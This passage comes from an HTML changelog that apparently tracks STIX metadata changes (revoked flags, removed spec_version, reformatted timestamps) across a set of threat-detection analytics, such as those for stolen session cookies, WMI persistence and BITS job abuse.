Detect Unsecured Credentials Shared in Chat Messages</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0074] Detect Use of Stolen Web Session Cookies Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0420] Detect User Activity Based Sandbox Evasion via Input & Artifact Probing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0086] Detect WMI Event Subscription for Persistence via WmiPrvSE Process and MOF Compilation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0901] Detect Windows Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16T17:34:53.603Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:34:53.603000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:22:49.681Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0404] Detect Winlogon Helper DLL Abuse via Registry and Process Artifacts on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0205] Detect XSL Script Abuse via msxsl and wmic</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0488] Detect abuse of Trusted Relationships (third-party and delegated admin access)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0098] Detect abuse of Windows BITS Jobs for download, execution and persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0507] Detect browser session hijacking via privilege, handle access, and remote thread into browsers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0561] Detect malicious IDE extension install/usage and IDE tunneling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0125] Detect persistence via reopened application plist modification (macOS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0473] Detect persistent or elevated container services via container runtime or cluster manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0225] Detect unauthorized LSASS driver persistence via LSA plugin abuse (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0069] Detect unauthorized or suspicious Hardware Additions (USB/Thunderbolt/Network)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0361] Detecting .NET COM Registration Abuse via Regsvcs/Regasm</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 